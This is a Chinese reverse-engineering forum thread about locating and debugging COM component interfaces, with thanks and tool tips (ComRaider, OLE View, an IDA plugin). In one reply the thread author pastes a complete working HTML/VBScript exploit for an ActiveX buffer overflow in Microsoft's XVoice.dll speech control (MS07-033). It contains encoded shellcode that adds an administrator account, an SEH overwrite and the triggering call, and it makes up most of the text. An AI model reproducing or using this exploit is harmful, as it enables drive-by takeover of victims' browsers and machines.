首页
论坛
专栏
课程
2

[原创]跟踪调试COM组件的接口

kisser1 2007-6-18 10:03 26392
跟踪调试COM组件的接口,具体内容请看附件
email:kisser1@126.com
QQ:87784858

快讯:看雪智能设备漏洞挖掘公开课招生中!

上传的附件:
最新回复 (18)
cyclotron 2007-6-18 13:38
2
好文章,学习~
不知道楼主对于activex组件的分发过程有没有研究?
kisser1 2007-6-19 09:01
3
具体的倒没有哦,当时,我的目标只有一个,就是能够定位COM组件的接口。
至于分发过程,网上也有关于这方面的文章,记得当时也是参考了这些文章
yijun8354 2007-6-19 09:36
4
继续学习:)
peaceclub 2007-6-19 09:55
5
comraider貌似不怎么好用.
peaceclub 2007-6-19 09:56
6
在问问,vb下直接tlbinf32.dll就可以.
delphi下如何获得COM组件的接口信息表?
kisser1 2007-6-19 11:22
7
Delphi下,具体情况我不晓得。
你知道COM是通用的嘛,所以,要查看COM的接口,可以使用ComRaider,或者
使用VC里的一个工具,叫做"Ole View",启动后,选择菜单“File”->“View TypeLib”,
即可看到COM接口的信息。

这篇文章,是基于 自动化COM 的。

ComRaider是我拿来挖掘漏洞用的。
看下面的代码,那个貌似是用ComRaider找到的,可惜到现在我还没找到过一个漏洞~ -_-!!
下面这个漏洞需要用到Unicode来写Shellcode。比较麻烦点。
<!--
01/06/2007 23.19.50
Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll)
/ DirectSpeechRecognition Module (Xlisten.dll)
remote buffer overflow exploit / 2k sp4 seh version

both the dlls are located in %SystemRoot%\speech folder
and they are vulnerable to the same issue.
while on 2k it depends on activex settings, under xp they are both
set to "safe for a trusted caller", i.e. Internet Explorer

registers after that some chars are passed to ModeName argument
of FindEgine method and seh handler is overwritten:

EAX 00000000
ECX 00000000
EDX 02770608
EBX 6535F590 XVoice.6535F590
ESP 0012DBB8 UNICODE "AAAA...
EBP 00410041 IEXPLORE.00410041
ESI 001921BC
EDI 0012DBF8 UNICODE "AAAA...
EIP 00410041 IEXPLORE.00410041

I succesfully run this code on win2k, patching the shellcode
with the venetian technique, adding an Administrator account,
against IE6.
Under xp, with predefined settings, Internet Explorer immediately crashes
without warning the user first, and it's still possible running arbitrary
code, it depends on jumpable Unicode addresses loaded in memory

by A. Micalizzi (aka rgod)
site: retrogod.altervista.org

***note: this was indipendently discovered by me and Will Dormann during the
same period, documented here:

http://www.kb.cert.org/vuls/id/507433
http://www.microsoft.com/technet/security/Bulletin/MS07-033.mspx

the affected package,
http://www.microsoft.com/speech/AppHelp(SAPI4)/sapi4.asp

is still distributed with the kill bit not set

-->

<html>
<object classid='clsid:EEE78591-FE22-11D0-8BEF-0060081841DE' id='DirectSS'></OBJECT>
<script language='vbscript'>

targetFile = "C:\WINNT\speech\XVoice.dll"
memberName = "FindEngine"
progid     = "ACTIVEVOICEPROJECTLib.DirectSS"
argCount   = 28

REM metasploit one, JmpCallAddtive, add a user 'su' with pass 'p'
scode_fragment = unescape("%6E%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%6e%40%06%90%90%90%90%90%90%90%fc%e4%22%eb%5e%31%ad%c3%c0%f7%e8%ff%ff%af%1a%30%5f%bb%5a%bd%ee%a5%ae%d4%19%e3%9b%3a%05%b9%42%03%a7%41%4c%11%a9%7c%ee%7f%77%8c%f3%90%e8%b4%ef%4c%d4%8c%d4%99%e4%5d%08%1e%9a%82%17%b3%21%43%31%44%5a%1b%6d%f5%69%39%d9%c4%38%50%43%af%44%cc%df%76%7a%57%a5%c2%85%7e%b7%f3%18%d3%39%70%9f%16%94%aa%37%5f%c5%ea%0a%70%23%10%c0%83%47%37%eb%97%6a%b3%6c%3c%6c")

nop1  = unescape("%01%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40")
c1    = unescape("%6E") : REM add byte ptr esi, ch (as nop)
c2    = unescape("%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%40%6E%97%6E%40") : REM xchg eax, edi
c3    = unescape("%6E%40%6E%05%18%09") : REM add eax
c4    = unescape("%6E%40%6E%2d%11%09") : REM sub eax
c5    = unescape("%6E%80%90%6E%40%6E%40") : REM add byte ptr eax 90, inc eax twice

code  = nop1 & c1 & c2 & c3 & c4 & c5 & _
unescape("%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6E%80%90%6E%40%6E%40%6e%80%bb%6e%40%6e%40%6e%80%47%6e%40%6e%40%6e%80%1a%6e%40%6e%40%6e%80%0c%6e%40%6e%40%6e%80%56%6e%40%6e%40%6e%80%1e%6e%40%6e%40%6e%80%01%6e%40%6e%40%6e%80%85%6e%40%6e%40%6e%80%75%6e%40%6e%40%6e%80%c3%6e%40%6e%40%6e%80%ef%6e%40%6e%40%6e%80%ff%6e%40%6e%40%6e%80%18%6e%40%6e%40%6e%80%66%6e%40%6e%40%6e%80%e0%6e%40%6e%40%6e%80%ec%6e%40%6e%40%6e%80%dc%6e%40%6e%40%6e%80%8e%6e%40%6e%40%6e%80%64%6e%40%6e%40%6e%80%81%6e%40%6e%40%6e%80%db%6e%40%6e%40%6e%80%d6%6e%40%6e%40%6e%80%c3%6e%40%6e%40%6e%80%03%6e%40%6e%40%6e%80%88%6e%40%6e%40%6e%80%58%6e%40%6e%40%6e%80%60%6e%40%6e%40%6e%80%9f%6e%40%6e%40%6e%80%d0%6e%40%6e%40%6e%80%df%6e%40%6e%40%6e%80%2f%6e%40%6e%40%6e%80%15%6e%40%6e%40%6e%80%2e%6e%40%6e%40%6e%80%41%6e%40%6e%40%6e%80%0b%6e%40%6e%40%6e%80%b2%6e%40%6e%40%6e%80%1e%6e%40%6e%40%6e%80%31%6e%40%6e%40%6e%80%c4%6e%40%6e%40%6e%80%ad%6e%40%6e%40%6e%80%8f%6e%40%6e%40%6e%80%7a%6e%40%6e%40%6e%80%d0%6e%40%6e%40%6e%80%7d%6e%40%6e%40%6e%80%65%6e%40%6e%40%6e%80%f6%6e%40%6e%40%6e%80%92%6e%40%6e%40%6e%80%54%6e%40%6e%40%6e%80%60%6e%40%6e%40%6e%80%54%6e%40%6e%40%6e%80%0c%6e%40%6e%40%6e%80%d7%6e%40%6e%40%6e%80%49%6e%40%6e%40%6e%80%af%6e%40%6e%40%6e%80%da%6e%40%6e%40%6e%80%5c%6e%40%6e%40%6e%80%ac%6e%40%6e%40%6e%80%f1%6e%40%6e%40%6e%80%24%6e%40%6e%40%6e%80%e2%6e%40%6e%40%6e%80%3f%6e%40%6e%40%6e%80%44%6e%40%6e%40%6e%80%3f%6e%40%6e%40%6e%80%2e%6e%40%6e%40%6e%80%03%6e%40%6e%40%6e%80%01%6e%40%6e%40%6e%80%1b%6e%40%6e%40%6e%80%e8%6e%40%6e%40%6e%80%58%6e%40%6e%40%6e%80%91%6e%40%6e%40%6e%80%36%6e%40%6e%40%6e%80%be%6e%40%6e%40%6e%80%b5%6e%40%6e%40%6e%80%a7%6e%40%6e%40%6e%80%b3%6e%40%6e%40%6e%80%80%6e%40%6e%40%6e%80%24%6e%40%6e%40%6e%80%43%6e%40%6e%40%6e%80%84%6e%40%6e%40%6e%80%e4%6e%40%6e%40%6e%80%f8%6e%40%6e%40%6e%80%77%6e%40%6e%40%6e%80%96%6e%40%6e%40%6e%80%03%6e%40%6e%40%6e%80%13%6e%40%6e%40%6e%80%89%6e%40%6e%40%6e%80%fb%6e%40%6e%40%6e%80%24%6e%40%6e%40%6e%80%8b%6e%40%6e%40%6e%80%e9%6e%40%6e%40%6e%80%0f%6e%40%6e%40%6e%80%d6%6e%40%6e%40%6e%80%ef%6e%40%6e%40%6e%80%73%6e%40%6e%40%6e%80%cf%6e%40%6e%40%6e%80%14%6e%40%6e%40%6e%80%6e%6e%40%6e%40%6e%80%8c%6e%40%6e%40%6e%80%1f%6e%40%6e%40%6e%80%22%6e%40%6e%40%6e%80%9e%6e%40%6e%40%6e%80%ae%6e%40%6e%40%6e%80%4e%6e%40%6e%40%6e%80%43%6e%40%6e%40%6e%80%fc%6e%40%6e%40%6e%80%d7%6e%40%6e%40%6e%80%72%6e%40%6e%40%6e%80%38%6e%40%6e%40%6e%80%07%6e%40%6e%40%6e%80%17%6e%40%6e%40%6e%80%83%6e%40%6e%40%6e%80%67%6e%40%6e%40%6e%80%4b%6e%40%6e%40%6e%80%68%6e%40%6e%40")

seh_handler=unescape("%23%7d") : REM 0x007d0023 call edi, found with msfpescan
eax = unescape("%01%12") : REM fix eax register, we fall in a more convenient condition

suntzu = String(950, "A") + eax + seh_handler + code + scode_fragment

EngineID="default"
MfgName="default"
ProductName="default"
ModeID="default"
ModeName= suntzu
LanguageID=1
Dialect="default"
Speaker="default"
Style="default"
Gender=1
Age=1
Features=1
Interfaces=1
EngineFeatures=1
RankEngineID=1
RankMfgName=1
RankProductName=1
RankModeID=1
RankModeName=1
RankLanguage=1
RankDialect=1
RankSpeaker=1
RankStyle=1
RankGender=1
RankAge=1
RankFeatures=1
RankInterfaces=1
RankEngineFeatures=1

DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures

</script>
</html>
blowfish 2007-6-19 14:58
8
IDA pro有个插件Com Plugin可以加载COM组件后根据typelib来定位每个接口函数的地址。
不过是for老版本的IDA的,不能在v5.1上编译。有兴趣的可以改一下。

http://www.openrce.org/downloads/details/10/Com_Plugin_v1.2
tantang 2010-11-28 10:27
9
最近弄这个。。。这个文档太有帮助了。。。谢谢
QGW 2010-11-29 06:52
10
学习了,非常感谢
xiaobodian 2011-2-15 13:00
11
楼主的资料我认真看过,但还是想跟楼主交流一下我的想法,既然你这里是跟踪调试COM组件,那么请问楼主有没有办法跟踪调试特定应用软件的COM组件呢?又具体化来说,对于具有COM格式并基于OLE的ActiveX,不知楼主有没有好的办法可以定位、跟踪?
    期待楼主的答复。
katar 2011-9-16 20:47
12
先谢过!
baron 2012-2-8 21:29
13
正好无意中看到这个了
horseear 2012-3-18 20:32
14
好文章啊,但是如何对付Anti-Debug呢?
卡住了

半斤八兩 2014-1-7 19:09
15
LZ,附件中的程序,用你的方法对dispcallfunc下断,结果函数还是无法断下~
上传的附件:
cuixzuo 2014-2-16 19:55
16
对于oleaut32.dll内部,有没有公式可以表达它把dispid计算为地址的方法?
ling林 2014-2-16 20:52
17
mark....
xdlakx 2015-7-5 16:00
18
很好的文章,谢谢分享
fanghongjian 2018-8-10 17:35
19
正好需要,感谢分享
返回